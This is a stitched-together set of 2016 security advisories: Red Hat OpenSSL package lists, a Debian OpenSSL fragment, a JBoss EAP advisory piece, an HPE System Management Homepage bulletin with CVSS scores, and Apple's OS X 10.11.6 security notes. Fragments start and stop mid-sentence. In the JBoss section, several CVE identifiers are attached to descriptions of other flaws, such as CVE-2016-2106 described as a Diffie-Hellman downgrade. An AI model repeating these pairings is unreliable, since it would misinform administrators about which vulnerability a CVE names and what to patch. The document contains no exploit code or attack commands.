7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.5.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.5.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.5.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0799\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-2107\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2109\nhttps://access.redhat.com/security/cve/CVE-2016-2842\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXMFlTXlSAg2UNWIIRAhYAAJ0T9Ib2vXUa5te34i6fphHrbe0HlwCfePy5\nWjaK8x9OaI0FgbWyfxvwq6o=\n=jHjh\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. This could lead to a heap corruption. \n This could lead to a heap corruption. \n\nCVE-2016-2108\n\n David Benjamin from Google discovered that two separate bugs in the\n ASN.1 encoder, related to handling of negative zero integer values\n and large universal tags, could lead to an out-of-bounds write. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.2h-1. Description:\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7. \n\nThis release includes bug fixes and enhancements, as well as a new release\nof OpenSSL that addresses a number of outstanding security flaws. For\nfurther information, see the knowledge base article linked to in the\nReferences section. The JBoss server process must be restarted for the update\nto take effect. \n(CVE-2016-2108)\n\n* Multiple flaws were found in the way httpd parsed HTTP requests and\nresponses using chunked transfer encoding. A remote attacker could use\nthese flaws to create a specially crafted request, which httpd would decode\ndifferently from an HTTP proxy software in front of it, possibly leading to\nHTTP request smuggling attacks. (CVE-2015-3195)\n\n* A flaw was found in the way the TLS protocol composes the Diffie-Hellman\nexchange (for both export and non-export grade cipher suites). An attacker\ncould use this flaw to downgrade a DHE connection to use export-grade key\nsizes, which could then be broken by sufficient pre-computation. This can\nlead to a passive man-in-the-middle attack in which the attacker is able to\ndecrypt all traffic. (CVE-2016-2106)\n\n* It was discovered that it is possible to remotely Segfault Apache http\nserver with a specially crafted string sent to the mod_cluster via service\nmessages (MCMP). (CVE-2016-2109)\n\n* It was discovered that specifying configuration with a JVMRoute path\nlonger than 80 characters will cause segmentation fault leading to a server\ncrash. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05320149\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05320149\nVersion: 1\n\nHPSBMU03653 rev.1 - HPE System Management Homepage (SMH), Remote Arbitrary\nCode Execution, Cross-Site Scripting (XSS), Denial of Service (DoS),\nUnauthorized Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-10-26\nLast Updated: 2016-10-26\n\nPotential Security Impact: Remote: Arbitrary Code Execution, Cross-Site\nScripting (XSS), Denial of Service (DoS), Unauthorized Disclosure of\nInformation\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nMultiple potential security vulnerabilities have been identified in HPE\nSystem Management Homepage (SMH) on Windows and Linux. The vulnerabilities\ncould be remotely exploited using man-in-the-middle (MITM) attacks resulting\nin cross-site scripting (XSS), arbitrary code execution, Denial of Service\n(DoS), and/or unauthorized disclosure of information. \n\nReferences:\n\n - CVE-2016-2107 - OpenSSL, Unauthorized disclosure of information\n - CVE-2016-2106 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-2109 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-2105 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-3739 - cURL and libcurl, Remote code execution\n - CVE-2016-5388 - \"HTTPoxy\", Apache Tomcat\n - CVE-2016-5387 - \"HTTPoxy\", Apache HTTP Server\n - CVE-2016-5385 - \"HTTPoxy\", PHP \n - CVE-2016-4543 - PHP, multiple impact\n - CVE-2016-4071 - PHP, multiple impact\n - CVE-2016-4072 - PHP, multiple impact\n - CVE-2016-4542 - PHP, multiple impact\n - CVE-2016-4541 - PHP, multiple impact\n - CVE-2016-4540 - PHP, multiple impact\n - CVE-2016-4539 - PHP, multiple impact\n - CVE-2016-4538 - PHP, multiple impact\n - CVE-2016-4537 - PHP, multiple impact\n - CVE-2016-4343 - PHP, multiple impact\n - CVE-2016-4342 - PHP, multiple impact\n - CVE-2016-4070 - PHP, Denial of Service (DoS)\n - CVE-2016-4393 - PSRT110263, XSS vulnerability\n - CVE-2016-4394 - PSRT110263, HSTS vulnerability\n - CVE-2016-4395 - ZDI-CAN-3722, PSRT110115, Buffer Overflow\n - CVE-2016-4396 - ZDI-CAN-3730, PSRT110116, Buffer Overflow\n - PSRT110145\n - PSRT110263\n - PSRT110115\n - PSRT110116\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - HPE System Management Homepage - all versions prior to v7.6\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2016-2105\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2106\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2107\n 5.9 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\n 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n CVE-2016-2109\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)\n\n CVE-2016-3739\n 5.3 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N\n 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\n\n CVE-2016-4070\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-4071\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4072\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4342\n 8.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n 8.3 (AV:N/AC:M/Au:N/C:P/I:P/A:C)\n\n CVE-2016-4343\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4393\n 4.2 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\n 4.9 (AV:N/AC:M/Au:S/C:P/I:P/A:N)\n\n CVE-2016-4394\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)\n\n CVE-2016-4395\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n 7.8 (AV:N/AC:L/Au:N/C:N/I:C/A:N)\n\n CVE-2016-4396\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n 7.8 (AV:N/AC:L/Au:N/C:N/I:C/A:N)\n\n CVE-2016-4537\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4538\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4539\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4540\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4541\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4542\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4543\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-5385\n 8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\n\n CVE-2016-5387\n 8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\n\n CVE-2016-5388\n 8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\n* Hewlett Packard Enterprise thanks Tenable Network Security for working with\nTrend Micro\u0027s Zero Day Initiative (ZDI) for reporting CVE-2016-4395 and\nCVE-2016-4396 to security-alert@hpe.com\n\nRESOLUTION\n\nHPE has made the following software updates available to resolve the\nvulnerabilities for the impacted versions of System Management Homepage\n(SMH). \n\nPlease download and install HPE System Management Homepage (SMH) v7.6.0 from\nthe following locations: \n\n* \u003chttps://www.hpe.com/us/en/product-catalog/detail/pip.344313.html\u003e\n\nHISTORY\nVersion:1 (rev.1) - 26 October 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update\n2016-004\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 is now\navailable and addresses the following:\n\napache_mod_php\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in PHP versions prior to\n5.5.36. These were addressed by updating PHP to version 5.5.36. \nCVE-2016-4650\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read was addressed through improved\ninput validation. \nCVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted audio file may lead to the\ndisclosure of user information\nDescription: An out-of-bounds read was addressed through improved\nbounds checking. \nCVE-2016-4646 : Steven Seeley of Source Incite working with Trend\nMicro\u0027s Zero Day Initiative\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nbsdiff\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in bspatch. This issue was\naddressed through improved bounds checking. \nCVE-2014-9862 : an anonymous researcher\n\nCFNetwork\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to view sensitive user information\nDescription: A permissions issue existed in the handling of web\nbrowser cookies. This issue was addressed through improved\nrestrictions. \nCVE-2016-4645 : Abhinav Bansal of Zscaler Inc. \n\nCoreGraphics\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nCoreGraphics\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to elevate privileges\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nFaceTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An attacker in a privileged network position may be able to\ncause a relayed call to continue transmitting audio while appearing\nas if the call terminated\nDescription: User interface inconsistencies existed in the handling\nof relayed calls. These issues were addressed through improved\nFaceTime display logic. \nCVE-2016-4635 : Martin Vigo\n\nGraphics Drivers\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4634 : Stefan Esser of SektionEins\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory consumption issue was addressed through\nimproved memory handling. \nCVE-2016-4632 : Evgeny Sidorov of Yandex\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nImageIO\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\nCVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4633 : an anonymous researcher\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4626 : Stefan Esser of SektionEins\n\nIOSurface\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A use-after-free was addressed through improved memory\nmanagement. \nCVE-2016-4625 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1863 : Ian Beer of Google Project Zero\nCVE-2016-1864 : Ju Zhu of Trend Micro\nCVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab\n(@keen_lab), Tencent\n\nlibc++abi\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An application may be able to execute arbitrary code with\nroot privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4621 : an anonymous researcher\n\nlibexpat\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-0718 : Gustavo Grieco\n\nLibreSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in LibreSSL before 2.2.7. These\nwere addressed by updating LibreSSL to version 2.2.7. \nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand,\nIan Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted XML document may lead to\ndisclosure of user information\nDescription: An access issue existed in the parsing of maliciously\ncrafted XML files. This issue was addressed through improved input\nvalidation. \nCVE-2016-4449 : Kostya Serebryany\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxml2\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4448 : Apple\nCVE-2016-4483 : Gustavo Grieco\nCVE-2016-4614 : Nick Wellnhofe\nCVE-2016-4615 : Nick Wellnhofer\nCVE-2016-4616 : Michael Paddon\nCVE-2016-4619 : Hanno Boeck\n\nlibxslt\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxslt\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1684 : Nicolas GrA(c)goire\nCVE-2016-4607 : Nick Wellnhofer\nCVE-2016-4608 : Nicolas GrA(c)goire\nCVE-2016-4609 : Nick Wellnhofer\nCVE-2016-4610 : Nick Wellnhofer\nCVE-2016-4612 : Nicolas GrA(c)goire\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to compromise of user information\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to the compromise of user information\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a denial of service\nDescription: A memory initialization issue was addressed through\nimproved memory handling. \nCVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to gain root privileges\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in OpenSSL. \nCVE-2016-2105 : Guido Vranken\nCVE-2016-2106 : Guido Vranken\nCVE-2016-2107 : Juraj Somorovsky\nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\nCVE-2016-2176 : Guido Vranken\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4596 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4597 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4600 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4602 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4598 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted SGI file may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4601 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4599 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nSafari Login AutoFill\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A user\u0027s password may be visible on screen\nDescription: An issue existed in Safari\u0027s password auto-fill. This\nissue was addressed through improved matching of form fields. \nCVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD\n\nSandbox Profiles\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local application may be able to access the process list\nDescription: An access issue existed with privileged API calls. This\nissue was addressed through additional restrictions. \nCVE-2016-4594 : Stefan Esser of SektionEins\n\nNote: OS X El Capitan 10.11.6 includes the security content of Safari\n9.1.2. For further details see https://support.apple.com/kb/HT206900\n\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - 